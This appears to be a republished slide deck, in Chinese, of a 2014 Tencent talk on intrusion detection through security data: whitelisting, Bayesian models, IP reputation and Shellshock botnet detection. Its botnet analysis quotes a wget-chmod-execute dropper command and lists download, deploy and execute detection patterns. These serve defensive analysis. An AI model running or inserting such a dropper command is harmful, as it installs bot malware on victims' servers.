简介:
1.对于入侵检测规则建设难点的思考;
2.如何利用历史案例和数据运营手段完善检测能力;
3.如何通过分析安全数据发现僵尸网络、建立ip信誉库,以及shellshock 蠕虫检测实践;
4.总结现有系统的局限性,以及对开放合作的展望。
1)建设的系统 ==>我们的能力 ==>能力 = 积累==>我们的局限=系统的局限==>怎么破!? ==>向数据学习==> 唯快不破
2 )防住漏洞就能阻断入侵?
3) 1day能否及时感知?
• 几十万台服务器?
•NO ,在我眼里这是几十万个蜜罐!
• 200T+/天 安全数据
• 基础运维审计数据
DB审计
运维命令
入侵检测系统告警数据
• IDS\IPS
• 可疑行为
• 黑客行为
• 违规操作
• 扫描数据
• 端口扫描\暴力破解\WAF
• 小型网络\单一业务特点
• 运维习惯(命令)固定
• 代码风格(CGI文件)固定
• DB (sql )操作固定
• Discuz\wordpress…
• 如何快速甄别异常
• 非我们熟悉的行为均为异常
• 提炼熟悉的行为
• 白名单 非白即黑
• 文件MD5
• Tripwire
• 命令
• 参数\ 目录\用户\时间
• Sql语句
• 语法树解析(sqlparse )
• 开源系统
• 固定sql语句,仅参数变化
• Sql注入
• 联合查询-payload依附于业务逻辑sql语句中
• 多分支查询-payload希望获取业务数据之外的内容
• 白名单模型
• Srcip+user+function+parameter
• 学习周期过长
• 滞后性-增量数据易误报
• 适用于某些特定业务\核心业务
• 结论
• 单一系统缺陷由多系统配合弥补(白加黑)
• 业务种类较多的网络不适用
• 那些无法定性的可疑事件有价值吗?
• 下载外网文件\编译文件
• 通过弱口令进入系统 dump数据
• 编译部署一个文件传输工具
• Wget->解压->执行
• 步骤一定是相同的吗?
• 固化的关联规则还有其他组合方式吗?如何穷尽?
• 贝叶斯决策理论方法是统计模型决策中的一个基本方法
• 假定B1,B2,……是某个过程的若干可能的前提,则P(Bi)是人们事先对各前提条件出现可能性大小的估计,称之为先验概率。如果这个过程得到了一个结果A ,那么贝叶斯公式提供了我们根据A的出现而对前提条件做出新评价的方法。P(Bi∣A)即是对以A为前提下Bi的出现概率的重新认识,称 P(Bi∣A)为后验概率。
• 算法:贝叶斯
• 样本:历史案例,运维数据
• A=入侵概率
• B=运维操作概率
• N联合概率 =入侵事件
• 周期性自主纠偏
•不同业务场景不同风险不同
• 场景举例:
• mysqldump 在web前端机与DB服务器风险级别不同
• ssh登陆失败 在内网和外网风险级别不同
• 腾讯云业务:管理服务对外,用户运维工具各异,开源CMS漏洞各异
• 腾讯自有业务:运维流程规范,web是入侵主要入口
• 不同的场景和业务需分别建模
• 样本严重不足,怎么办?
• 主动分析对手
• 如何向对手学习更多
• 拓展数据分析纬度
• 闭环运营
• 循环迭代,完善监测规则
• 识别对手
• UA
• 扫描器:版权\版本声明
• COOKIE
• NULL | 固定值 | (伪)随机参数
• PAYLOAD
• 固定回显字符串
• 来源
• 大范围扫描触发规则
• 已知对手的固定来源IP
• Spam list
• 数据精炼
• 解包\参数拆解
• 符合粗规则的参数范围
• 固化或符合随机规律的payload
• 攻击场景相关
• 语言相关
• APP相关
• 开源cms 库表
• CGI\cookie\parameter
• Webapp指纹 +payload= (0/1/N)day
• 通用漏洞影响范围
• 猜猜这都是什么开源系统?
• 通用攻击手法影响范围
• Jsp\php 代码注入 ?Sql注入?
• 自动及时捕获1day
• 避免人为因素导致的信息滞后
• 及时建立防护解决方案
• 自身业务开源APP
• 腾讯云商户使用的主流APP
• 自身业务
• Discuz
• struts
• 云商户
• Dedecms
• Phpcms
• Wdcp
• other …
• 现在的趋势:漏洞披露->大范围攻击爆发 几乎0时差
• (2014-09-25 11:20:27)发现 Thanks-Rob Worm
• (2014-09-25 22:35:44)国内僵尸网络节点
•(2014-09-26 )各种变种满天飞
• 僵尸网络常见架构
• 数据(payload )特点
• 僵尸网络提取逻辑
• 历史漏洞检测规则(如:PHP-CGI RCE )
• WAF数据Payload分析
• wget -P /tmp http://1.1.1.1/arm;chmod +x /tmp/arm;/tmp/arm
• 对手:僵尸网络特征
• 下载(wget\curl…) + 部署(tar\chmod..) + 执行(/tmp\perl\php)
• 发现Thanks-Rob
• Shellshock 僵尸网络趋势
• 新的僵尸网络不断涌现
• 盈利模式:挖矿\偷比特币\ DDOS
• 开发语言:Perl\php\python\java\c\c++\Go 语言蠕虫
• 平台:armeabi\arm\ppc\mips\x86\nodes\sig
• 5条单点规则优化
• 10条贝叶斯子规则优化
• 1day及时感知
• 假设应急人员在休假,安全系统如何感知和更新新型攻击 ?
• 研究僵尸网络手法工具
• 更新恶意行为特征库
• 黑客工具特征与行为研究
• IP信誉库
• 及时更新ACL
• 再大的量也只是整个互联网的一个小数点
• 如何将安全网编织得更大?
• 定期僵尸网络\恶意IP\蠕虫
• 僵尸网络蠕虫分析分享
• 合作剿灭僵尸网络,控制影响
• IP信誉库
• 蠕虫事件同步
• 0/1day攻击事件同步
• 本议题探讨一类学习方法,通过数据自动学习提升安全系统能力
• 兵马未动粮草先行 兵马未动情报先行
• 大中型网络攻防双方的对抗有演化成数据优势竞争的趋势
腾讯高级安全工程师 《掘金安全数据-腾讯安全数据运营实践》
讲师简介:拥有10多年安全研究与从业经验。2010年加入腾讯,在入侵检测体系建设、应急响应、安全培训方面有独到的见解。
课程简介:
1.对于入侵检测规则建设难点的思考;
2.如何利用历史案例和数据运营手段完善检测能力;
3.如何通过分析安全数据发现僵尸网络、建立ip信誉库,以及shellshock 蠕虫检测实践;
4.总结现有系统的局限性,以及对开放合作的展望。
【本文是2014WOT技术峰会深圳站 腾讯安全平台部江虎 演讲的《掘金安全数据-腾讯安全数据运营实践》
pdf下载地址戳这里《掘金安全数据-腾讯安全数据运营实践》 SP小编整理发布】
本文作者:SP小编
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/2509.html
好!!!
@Madmaner 多谢支持